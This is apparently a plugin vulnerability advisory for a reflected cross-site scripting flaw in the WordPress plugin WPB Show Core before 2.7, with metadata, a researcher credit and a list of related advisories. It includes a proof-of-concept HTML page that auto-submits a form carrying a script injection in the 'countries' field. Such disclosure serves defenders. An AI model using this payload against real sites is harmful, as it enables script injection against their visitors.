WPB Show Core < 2.7 – Reflected XSS | CVE 2024-1956 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the parameters before outputting it back in the response of an unauthenticated request, leading to a Reflected Cross-Site Scripting

Proof of Concept

Open an HTML file containing the following:

```
<html>
  <body>
    <form action="https://example.com/wp-content/plugins/wpb-show-core/auto-suggest-categories/subscribe.php" id="hack" method="POST">
      <input type="hidden" name="firstname" value="test" />
      <input type="hidden" name="lastname" value="test2" />    
      <input type="hidden" name="countries" value='xxxxxx"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>
```

Affects Plugins

Fixed in 2.7

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

d7034ac2-0098-48d2-9ba9-87e09b178f7d

Timeline

Publicly Published

2024-03-18 (about 1 year ago)

Added

2024-03-18 (about 1 year ago)

Last Updated

2024-03-18 (about 1 year ago)

Other

Published

Title

Published

2022-10-10

Title

eCommerce Product Catalog Plugin for WordPress < 3.0.71 - Reflected XSS

Published

2021-07-12

Title

Wr Age Verification < 2.0.0 - Reflected Cross-Site Scripting (XSS)

Published

2024-03-27

Title

Easy Social Feed < 6.5.6 - Contributor+ Stored XSS

Published

2024-11-08

Title

Dynamic Post Grid Elementor Addon < 1.0.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-06-06

Title

One Page Express Companion < 1.6.38 - Authenticated (Contributor+) Stored Cross-Site Scripting via one_page_express_contact_form Shortcode